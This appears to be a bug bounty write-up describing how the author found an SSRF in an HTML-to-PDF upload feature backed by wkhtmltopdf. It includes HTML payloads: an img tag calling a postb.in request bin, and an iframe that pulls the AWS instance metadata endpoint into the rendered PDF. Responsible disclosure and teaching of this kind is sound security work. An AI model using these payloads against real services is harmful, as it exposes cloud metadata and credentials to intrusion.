How I discovered an SSRF leading to AWS Metadata Leakage

I am writing this story to share an experience I had recently discovering an SSRF vulnerability for a private program on H1. Since the program is private, I won’t divulge much information related to the platform, rather I will discuss my thought process when testing for this vulnerability.

The Vulnerable Endpoint

This platform allowed user to upload a bunch of filetypes. To be precise about the filetype the platform supported, I am just going to post the input file HTML tag straight from the page:

<input type="file" class="button button--invert" onclick="this.value = null;" ngf-accept="file_input_accept_string || utils.FILE_INPUT_ACCEPT_STRING" ngf-select="onFileSelect($files)" accept=".jpg,.jpeg,.png,.tiff,.eps,.ico,.gif,.bmp,.txt,.md,.pdf,.html,.htm,.rtf,.doc,.docx,.xls,.xlsx,.ppt,.pps,.ppsx,.pptx,.dot,.dotx,.xlt,.xltx,.odt,.oth,.odg,.odp,.ods,.odi,.oxt,.csv,audio/*,text/*,application/msword*,application/vnd.ms-*,application/vnd.oasis.opendocument.*,application/pdf">

Whatever filetype you upload to the platform, it converts the file to a PDF soon after upload. One filetype that caught my eye from the above list was “.html”. I started mentally reverse engineering the server backend responsible for generating the PDF from the HTML file.

Hypothesis #1:
My initial guess was that the server must be using some sort of a headless browser to render the HTML page and then exporting the page to PDF. My best guess was that it would be a headless Chromium running via Puppeteer. It was time to verify my hypothesis. I put together a basic HTML file and checked Burp for the response body when downloading the PDF file. Turned out, it wasn’t using Headless Chrome. PDFs created using headless Chrome have a Creator tag with the value “Skia/PDF m77”. Skia is graphics library created and maintained by Google. It is responsible for the ‘Save As PDF’ feature you use on Chrome. Hypothesis #1 disproven.

I had no other hypothesis to understand how this PDF must have been generated. Now, was the time to probe deeper. I wanted to understand if the rendering engine used by the backed attempted to access external resources referenced in the webpage.

Question #1: Does the renderer access external resources?
I put together this simple HTML to test if external resources are accessed.

<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Attack</title>
  </head>
  <body>
    <img src="https://ssl.gstatic.com/ui/v1/icons/mail/rfr/logo_gmail_lockup_default_2x.png"/>
  </body>
</html>

Let’s see what the server produces for us:

The answer is YES. The server does download external resources. This is where I realized that I may find a wonderful SSRF here. Moving ahead. Next question that came to my mind.

Question #2: How does the HTTP request look like when the server fetches external resources?
To check for SSRF, most people like to use Burp Collaborator. I, on the other hand, like to use https://postb.in. So, I created a postbin and generated the following HTML file:

<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Attack</title>
  </head>
  <body>
    <img src="https://postb.in/1581356305957-2842711033299?hello=world"/>
  </body>
</html>

Now, let’s see what the server gives out. I uploaded this file, waited for the PDF generation to complete and headed over to postb.in to check the fetch log. This is what postb.in had to show:

Sweet!

Large programs will accept and award such a report because it exposes the real IP address of the requesting server. But I did not stop here. I wanted real impact to show.

On further analyzing the HTTP request, I noticed this weird looking user-agent string: wkhtmltopdf. The name itself reveals half the story. This is probably some library used by the server to convert HTML files to PDF. I googled it and was directed to https://wkhtmltopdf.org/. OK, so my Question #1 was answered. This is how the server converted HTML to PDF. This also partially proves Hypothesis #1 because wkhtmltopdf is indeed a headless user agent.

Now that I had a confirmed SSRF, it was time to try accessing sensitive endpoints or attempt to access internal files. Through initial recon, I had learned that this server was hosted on AWS. So the most sensitive endpoint to test would be the AWS Instance Metadata Service. More about this here: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html

Hypothesis #2:
‘wkhtmltopdf’ will render sensitive data on the renderer before processing the output to a PDF. To test this hypothesis, I used the following payload:

  <body>
    <iframe
      src="https://169.254.169.254/latest/meta-data/"
      width="500"
      height="1000"
    ></iframe>
  </body>

And here’s what the server gives us:

Voila!

Hypothesis Proven. That’s impact right there. It feels great to report such critical findings to programs. I reported this vulnerability at night. It was triaged the next morning by H1 staff and rated Critical with a score of 10.0. Sweet!

As a side note, most of the SSRF PoCs will have an attempt to access the internal network. That is true for traditional on-premise hosted servers. On the cloud, that’s not true, unless the company is running a VPC.

Something about the format of my bounty hunting stories:

If you have read to this point, you would probably be wondering that this article does not deserve this length. It would have been easier for the reader if the main PoC was summed up in the first or second para. Yes, you are right. But, I write for myself. When trying to read bug bounty articles, I always try to look for the thought process of the hacker behind the find. Just concentrating on the PoC won’t take you far. Understanding and adapting your thought process is key to bounty hunting. Hence, instead of just writing what worked, I focus on writing how I reached to the final step that leads to the attack.

Happy Hacking!